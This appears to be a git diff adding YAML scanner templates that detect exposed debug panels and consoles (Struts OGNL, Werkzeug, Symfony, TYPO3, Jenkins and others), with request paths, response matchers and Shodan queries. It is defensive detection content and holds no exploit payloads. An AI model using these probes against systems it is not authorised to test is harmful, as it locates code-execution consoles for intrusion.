b/templates/workflows/misconfiguration/rekognition-image-validation.yaml @@ -0,0 +1,35 @@ +id: rekognition-image-validation + +info: + name: Rekognition Image Validation Debug UI Panel - Detect + author: tess + severity: info + description: Rekognition Image Validation UI panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: title:"Rekognition Image Validation Debug UI" + tags: misconfig,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Rekognition Image Validation Debug UI' + - 'Optional Parameters' + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402202a26973f550c3c1e20225cf9d1b1c1f86fe5893e2a251268dc359d728b940198022046667e4429e033c1cbe1214dfdfe344679e7e519f33734b2181b6921e54f80e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/sitecore-debug-page.yaml b/templates/workflows/misconfiguration/sitecore-debug-page.yaml new file mode 100644 index 0000000..6df095f --- /dev/null +++ b/templates/workflows/misconfiguration/sitecore-debug-page.yaml @@ -0,0 +1,27 @@ +id: sitecore-debug-page + +info: + name: SiteCore Debug Page + author: dhiyaneshDK + severity: low + description: SiteCore debug page is exposed. + metadata: + max-request: 1 + shodan-query: http.title:"Welcome to Sitecore" + tags: debug,sitecore,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/sitecore/'" + + matchers-condition: and + matchers: + - type: word + words: + - 'extranet\Anonymous' + + - type: status + status: + - 404 +# digest: 490a0046304402207e6cbaf4252b5bd45acfd358e91a711f5b4ba6c959fc48ba4bb1e37c3ae1937302207921ca078e2c9c6130e0a08d4cf967e17af3e4df80ac1404e166063d4ce167af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/struts-ognl-console.yaml b/templates/workflows/misconfiguration/struts-ognl-console.yaml new file mode 100644 index 0000000..8e5de87 --- /dev/null +++ b/templates/workflows/misconfiguration/struts-ognl-console.yaml @@ -0,0 +1,34 @@ +id: struts-ognl-console + +info: + name: Apache Struts - OGNL Console + author: DhiyaneshDK + severity: unknown + description: | + This development console allows the evaluation of OGNL expressions that could lead to Remote Command Execution + remediation: Restrict access to the struts console on the production server + reference: + - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java + metadata: + verified: true + max-request: 1 + shodan-query: html:"Struts Problem Report" + tags: apache,struts,ognl,panel,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}/struts/webconsole.html?debug=console' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to the OGNL console!' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100bb73b24e9ca24ea074ca1175b1d76e79d6f59f4c30644f2232dd1c3f7878d0cf0220703e23fa55255a8b6956da4755c05416f7527f199eb6a670a01d3bf9238dfe87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/symfony-debug.yaml b/templates/workflows/misconfiguration/symfony-debug.yaml new file mode 100644 index 0000000..3090850 --- /dev/null +++ b/templates/workflows/misconfiguration/symfony-debug.yaml @@ -0,0 +1,41 @@ +id: symfony-debug + +info: + name: Symfony Debug Mode + author: organiccrap,pdteam + severity: high + description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code. + reference: + - https://github.com/synacktiv/eos + metadata: + verified: true + max-request: 4 + shodan-query: http.html:"symfony Profiler" + tags: symfony,debug,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}' + - "{{BaseURL}}/admin_dev.php" + - "{{BaseURL}}/index_dev.php" + - "{{BaseURL}}/app_dev.php" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: header + words: + - 'x-debug-token-link:' + - '/_profiler/' + condition: and + case-insensitive: true + + - type: word + part: body + words: + - 'debug mode is enabled.' + - 'id="sfWebDebugSymfony"' + condition: or +# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/typo3-debug-mode.yaml b/templates/workflows/misconfiguration/typo3-debug-mode.yaml new file mode 100644 index 0000000..7dc0f51 --- /dev/null +++ b/templates/workflows/misconfiguration/typo3-debug-mode.yaml @@ -0,0 +1,31 @@ +id: typo3-debug-mode + +info: + name: TYPO3 Debug Mode Enabled + author: tess + severity: low + description: TYPO3 Debug Mode is enabled. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"TYPO3 Exception" + tags: typo3,debug,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TYPO3 Exception" + - "Uncaught TYPO3 Exception" + condition: or + + - type: status + status: + - 500 +# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml b/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml new file mode 100644 index 0000000..6879c7b --- /dev/null +++ b/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml @@ -0,0 +1,29 @@ +id: wamp-xdebug-detect + +info: + name: WAMP Xdebug - Detect + author: e_schultze_ + severity: info + description: WAMP Xdebug was detected. + reference: + - https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: debug,config,wamp,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/?phpinfo=-1" + + matchers: + - type: word + words: + - 'xdebug.remote_connect_backOnOn' + part: body + +# digest: 490a0046304402202fd3e9daa0910b6e85ff4e8f4c0390ff720a2b9e76a611ca001a710e847a1ceb022024e41677c8d971632e36456e587d3f7b23bd6cb15938f22be2cec8b9edc150e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/technologies/werkzeug-debugger-detect.yaml b/templates/workflows/technologies/werkzeug-debugger-detect.yaml new file mode 100644 index 0000000..0a3aefb --- /dev/null +++ b/templates/workflows/technologies/werkzeug-debugger-detect.yaml @@ -0,0 +1,22 @@ +id: werkzeug-debugger-detect + +info: + name: Werkzeug debugger console + author: pdteam + severity: info + metadata: + max-request: 1 + tags: tech,werkzeug + +http: + - method: GET + path: + - "{{BaseURL}}/console" + + matchers: + - type: word + words: + - "

Interactive Console

" + part: body + +# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml new file mode 100644 index 0000000..e1823e4 --- /dev/null +++ b/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -0,0 +1,32 @@ +id: jenkins-stack-trace + +info: + name: Detect Jenkins in Debug Mode with Stack Traces Enabled + author: Dheerajmadhukar + severity: low + description: Module identified that the affected host is running an instance of Jenkins in debug mode, as a result stack traces are enabled. + reference: + - https://hackerone.com/reports/221833 + metadata: + max-request: 1 + tags: jenkins,hackerone + +http: + - method: GET + path: + - "{{BaseURL}}/adjuncts/3a890183/" + + matchers-condition: and + matchers: + - type: word + words: + - "java.lang.StringIndexOutOfBoundsException" + - "String index out of range" + part: body + condition: and + + - type: status + status: + - 500 + +# digest: 4b0a0048304602210090ecedd6e0a611f869394ae2afb7ee2b8fff8fed8cbfff1998250e38da3c79b9022100968c144032a3920ab6ce1e034b707724c5ddc8697cb6c3b1514d1233d75f6022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file